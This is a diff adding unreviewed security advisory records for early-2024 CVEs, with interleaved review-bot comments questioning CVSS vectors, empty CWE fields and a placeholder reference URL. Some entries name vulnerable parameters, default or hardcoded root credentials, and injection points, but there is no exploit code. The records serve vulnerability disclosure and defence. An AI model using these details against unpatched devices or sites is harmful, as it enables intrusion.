+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Reflected XSS.This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24866"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/biteship/wordpress-biteship-plugin-2-2-24-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-97vr-j4hr-qrq8/GHSA-97vr-j4hr-qrq8.json b/advisories/unreviewed/2024/02/GHSA-97vr-j4hr-qrq8/GHSA-97vr-j4hr-qrq8.json
new file mode 100644
index 0000000000000..001a01a7947e2
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-97vr-j4hr-qrq8/GHSA-97vr-j4hr-qrq8.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-97vr-j4hr-qrq8",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2024-22902"
+ ],
+ "details": "Vinchin Backup & Recovery v7.2 was discovered to be configured with default root credentials.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22902"
+ },
+ {
+ "type": "WEB",
+ "url": "https://blog.leakix.net/2024/01/vinchin-backup-rce-chain/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://seclists.org/fulldisclosure/2024/Jan/31"
+ },
+ {
+ "type": "WEB",
+ "url": "http://default.com"
+ },
+ {
+ "type": "WEB",
+ "url": "http://vinchin.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-987x-54mh-g54g/GHSA-987x-54mh-g54g.json b/advisories/unreviewed/2024/02/GHSA-987x-54mh-g54g/GHSA-987x-54mh-g54g.json
new file mode 100644
index 0000000000000..ff436fea400cb
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-987x-54mh-g54g/GHSA-987x-54mh-g54g.json
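Review bot: The GHSA-97vr-j4hr-qrq8 reference list carries `"url": "http://default.com"`, which is neither a Vinchin domain nor an advisory source and looks like a placeholder that leaked in from the CVE record; an advisory consumer following that `WEB` link lands on an unrelated third-party site, so the entry should be dropped rather than published. `http://vinchin.com` is likewise a bare plain-http vendor homepage rather than an advisory page; the LeakIX write-up and the Full Disclosure post are the substantive sources and could be kept on their own. `cwe_ids` is empty even though `details` describes a default-root-credentials weakness and the entry is rated CRITICAL, so the classification that downstream filters rely on is missing.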
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-987x-54mh-g54g",
+ "modified": "2024-02-05T06:30:31Z",
+ "published": "2024-02-05T06:30:31Z",
+ "aliases": [
+ "CVE-2024-20002"
+ ],
+ "details": "In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961715; Issue ID: DTV03961715.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20002"
+ },
+ {
+ "type": "WEB",
+ "url": "https://corp.mediatek.com/product-security-bulletin/February-2024"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-98fx-x879-qp6f/GHSA-98fx-x879-qp6f.json b/advisories/unreviewed/2024/02/GHSA-98fx-x879-qp6f/GHSA-98fx-x879-qp6f.json
new file mode 100644
index 0000000000000..9dddd3f88bf19
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-98fx-x879-qp6f/GHSA-98fx-x879-qp6f.json
@@ -0,0 +1,54 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-98fx-x879-qp6f",
+ "modified": "2024-02-07T21:30:27Z",
+ "published": "2024-02-07T21:30:27Z",
+ "aliases": [
+ "CVE-2023-6356"
+ ],
+ "details": "A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver and causing kernel panic and a denial of service.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6356"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0723"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0724"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0725"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2023-6356"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254054"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-476"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-996q-vfw9-5cfp/GHSA-996q-vfw9-5cfp.json b/advisories/unreviewed/2024/02/GHSA-996q-vfw9-5cfp/GHSA-996q-vfw9-5cfp.json
new file mode 100644
index 0000000000000..ce2f713da6546
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-996q-vfw9-5cfp/GHSA-996q-vfw9-5cfp.json
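Review bot: In GHSA-98fx-x879-qp6f the `details` text says an unauthenticated actor can trigger the NVMe/TCP NULL dereference, but the CVSS vector in `severity` carries `PR:L`, which asserts that low privileges are required; both cannot be right. If the Red Hat scoring is authoritative, the vector stays and the wording should be read as "network-reachable" rather than unauthenticated; if the description is right, the vector should be `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`, which would also move the entry out of the MODERATE band. Worth reconciling against the linked bugzilla entry before the advisory is marked reviewed, since consumers commonly gate on the PR field for exposure triage.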
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-996q-vfw9-5cfp",
+ "modified": "2024-02-08T06:30:23Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2023-47567"
+ ],
+ "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQTS 4.5.4.2627 build 20231225 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTS hero h4.5.4.2626 build 20231225 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47567"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-24-05"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-997r-3g6v-ph4j/GHSA-997r-3g6v-ph4j.json b/advisories/unreviewed/2024/02/GHSA-997r-3g6v-ph4j/GHSA-997r-3g6v-ph4j.json
new file mode 100644
index 0000000000000..1f4e389af3788
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-997r-3g6v-ph4j/GHSA-997r-3g6v-ph4j.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-997r-3g6v-ph4j",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-43517"
+ ],
+ "details": "Memory corruption in Automotive Multimedia due to improper access control in HAB.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43517"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json b/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json
new file mode 100644
index 0000000000000..b5759064a8cb3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-99gp-p4g8-wrh7/GHSA-99gp-p4g8-wrh7.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-99gp-p4g8-wrh7",
+ "modified": "2024-02-08T21:30:38Z",
+ "published": "2024-02-08T21:30:38Z",
+ "aliases": [
+ "CVE-2024-24497"
+ ],
+ "details": "SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtusername and txtpassword parameters in the login.php components.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24497"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/0xQRx/VulnerabilityResearch/blob/master/2024/EmployeeManagementSystem-SQL_Injection_Admin_Login.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T21:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-99jr-pjjw-hqmq/GHSA-99jr-pjjw-hqmq.json b/advisories/unreviewed/2024/02/GHSA-99jr-pjjw-hqmq/GHSA-99jr-pjjw-hqmq.json
new file mode 100644
index 0000000000000..a57f4cd8dffa5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-99jr-pjjw-hqmq/GHSA-99jr-pjjw-hqmq.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-99jr-pjjw-hqmq",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2023-6233"
+ ],
+ "details": "Buffer overflow in SLP attribute request process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6233"
+ },
+ {
+ "type": "WEB",
+ "url": "https://canon.jp/support/support-info/240205vulnerability-response"
+ },
+ {
+ "type": "WEB",
+ "url": "https://psirt.canon/advisory-information/cp2024-001/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.canon-europe.com/support/product-security-latest-news/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-787"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-99ph-prqq-pm8j/GHSA-99ph-prqq-pm8j.json b/advisories/unreviewed/2024/02/GHSA-99ph-prqq-pm8j/GHSA-99ph-prqq-pm8j.json
new file mode 100644
index 0000000000000..3d6b5a92c5daf
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-99ph-prqq-pm8j/GHSA-99ph-prqq-pm8j.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-99ph-prqq-pm8j",
+ "modified": "2024-02-05T06:30:31Z",
+ "published": "2024-02-05T06:30:31Z",
+ "aliases": [
+ "CVE-2024-24870"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Michael Dempfle Advanced iFrame allows Stored XSS.This issue affects Advanced iFrame: from n/a through 2023.10.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24870"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/advanced-iframe/wordpress-advanced-iframe-plugin-2023-10-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T06:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-99rx-9376-xmfc/GHSA-99rx-9376-xmfc.json b/advisories/unreviewed/2024/02/GHSA-99rx-9376-xmfc/GHSA-99rx-9376-xmfc.json
new file mode 100644
index 0000000000000..410738e6e91a8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-99rx-9376-xmfc/GHSA-99rx-9376-xmfc.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-99rx-9376-xmfc",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2023-43482"
+ ],
+ "details": "A command execution vulnerability exists in the guest resource functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43482"
+ },
+ {
+ "type": "WEB",
+ "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1850"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T17:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9c5v-wp94-33vx/GHSA-9c5v-wp94-33vx.json b/advisories/unreviewed/2024/02/GHSA-9c5v-wp94-33vx/GHSA-9c5v-wp94-33vx.json
new file mode 100644
index 0000000000000..a7800733a6b6d
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9c5v-wp94-33vx/GHSA-9c5v-wp94-33vx.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9c5v-wp94-33vx",
+ "modified": "2024-02-07T15:30:49Z",
+ "published": "2024-02-07T15:30:49Z",
+ "aliases": [
+ "CVE-2024-25200"
+ ],
+ "details": "Espruino 2v20 (commit fcc9ba4) was discovered to contain a Stack Overflow via the jspeFactorFunctionCall at src/jsparse.c.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25200"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/espruino/Espruino/issues/2457"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T14:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9c8h-crr5-vfcm/GHSA-9c8h-crr5-vfcm.json b/advisories/unreviewed/2024/02/GHSA-9c8h-crr5-vfcm/GHSA-9c8h-crr5-vfcm.json
new file mode 100644
index 0000000000000..7ced58943c39a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9c8h-crr5-vfcm/GHSA-9c8h-crr5-vfcm.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9c8h-crr5-vfcm",
+ "modified": "2024-02-02T09:30:22Z",
+ "published": "2024-02-02T09:30:22Z",
+ "aliases": [
+ "CVE-2024-24524"
+ ],
+ "details": "Cross Site Request Forgery (CSRF) vulnerability in flusity-CMS v.2.33, allows remote attackers to execute arbitrary code via the add_menu.php component.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24524"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/harryrabbit5651/cms/blob/main/1.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T08:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9fc8-v7vw-438w/GHSA-9fc8-v7vw-438w.json b/advisories/unreviewed/2024/02/GHSA-9fc8-v7vw-438w/GHSA-9fc8-v7vw-438w.json
new file mode 100644
index 0000000000000..f97300fc137ee
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9fc8-v7vw-438w/GHSA-9fc8-v7vw-438w.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9fc8-v7vw-438w",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2023-32451"
+ ],
+ "details": "\nDell Display Manager application, version 2.1.1.17, contains a vulnerability that low privilege user can execute malicious code during installation and uninstallation\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32451"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dell.com/support/kbdoc/en-us/000215216/dsa-2023-182-dell"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-272"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T08:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9fhr-gx36-jrfv/GHSA-9fhr-gx36-jrfv.json b/advisories/unreviewed/2024/02/GHSA-9fhr-gx36-jrfv/GHSA-9fhr-gx36-jrfv.json
new file mode 100644
index 0000000000000..dd2913df0ccbe
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9fhr-gx36-jrfv/GHSA-9fhr-gx36-jrfv.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9fhr-gx36-jrfv",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-22853"
+ ],
+ "details": "D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22853"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Beckaf/vunl/blob/main/D-Link/AC750/2/2.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com/en/security-bulletin/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T02:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9h66-72rx-4cp4/GHSA-9h66-72rx-4cp4.json b/advisories/unreviewed/2024/02/GHSA-9h66-72rx-4cp4/GHSA-9h66-72rx-4cp4.json
new file mode 100644
index 0000000000000..393dc940e3167
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9h66-72rx-4cp4/GHSA-9h66-72rx-4cp4.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9h66-72rx-4cp4",
+ "modified": "2024-02-08T15:30:27Z",
+ "published": "2024-02-08T15:30:27Z",
+ "aliases": [
+ "CVE-2024-24836"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Audrasjb GDPR Data Request Form allows Stored XSS.This issue affects GDPR Data Request Form: from n/a through 1.6.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24836"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/gdpr-data-request-form/wordpress-gdpr-data-request-form-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T13:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9hch-g858-cr9j/GHSA-9hch-g858-cr9j.json b/advisories/unreviewed/2024/02/GHSA-9hch-g858-cr9j/GHSA-9hch-g858-cr9j.json
new file mode 100644
index 0000000000000..c1105c7cddb0c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9hch-g858-cr9j/GHSA-9hch-g858-cr9j.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9hch-g858-cr9j",
+ "modified": "2024-02-02T15:30:28Z",
+ "published": "2024-02-02T15:30:28Z",
+ "aliases": [
+ "CVE-2023-47143"
+ ],
+ "details": "IBM Tivoli Application Dependency Discovery Manager 7.3.0.0 through 7.3.0.10 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 270270.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47143"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/270270"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7105139"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-116",
+ "CWE-644"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T13:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9hfp-g5cj-92p6/GHSA-9hfp-g5cj-92p6.json b/advisories/unreviewed/2024/02/GHSA-9hfp-g5cj-92p6/GHSA-9hfp-g5cj-92p6.json
new file mode 100644
index 0000000000000..113caebe40db7
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9hfp-g5cj-92p6/GHSA-9hfp-g5cj-92p6.json
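Review bot: The CVSS vector in GHSA-9hch-g858-cr9j, `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` (a 10.0-class score, which is what drives `"severity": "CRITICAL"`), does not fit the impact the `details` text actually describes: a Host-header injection leading to XSS, cache poisoning or session hijacking, which typically needs a victim to follow a link and does not by itself yield full integrity or availability loss. The vector appears to be copied through from the IBM/NVD record, so it may well be what the vendor published, but it should be checked against the linked X-Force entry before this goes out as CRITICAL, since the rating will drive alerting for anyone matching on severity.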
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9hfp-g5cj-92p6",
+ "modified": "2024-02-08T03:32:45Z",
+ "published": "2024-02-08T03:32:45Z",
+ "aliases": [
+ "CVE-2023-48974"
+ ],
+ "details": "Cross Site Scripting vulnerability in Axigen WebMail v.10.5.7 and before allows a remote attacker to escalate privileges via a crafted script to the serverName_input parameter.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48974"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.axigen.com/mail-server/download/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.axigen.com/updates/axigen-10.3.3.61"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T01:15:26Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-9hq5-xh26-hcx9/GHSA-9hq5-xh26-hcx9.json b/advisories/unreviewed/2024/02/GHSA-9hq5-xh26-hcx9/GHSA-9hq5-xh26-hcx9.json
new file mode 100644
index 0000000000000..f8542d80d799c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-9hq5-xh26-hcx9/GHSA-9hq5-xh26-hcx9.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9hq5-xh26-hcx9",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-46344"
+ ],
+ "details": "A vulnerability in Solar-Log Base 15 Firmware 6.0.1 Build 161, and possibly other Solar-Log Base products, allows an attacker to escalate their privileges by exploiting a stored cross-site scripting (XSS) vulnerability in the switch group function under /#ilang=DE&b=c_smartenergy_swgroups in the web portal. The vulnerability can be exploited to gain the rights of an installer or PM, which can then be used to gain administrative access to the web portal and execute further attacks.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46344"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/vinnie1717/CVE-2023-46344/blob/main/Solar-Log%20XSS"
+ },
+ {
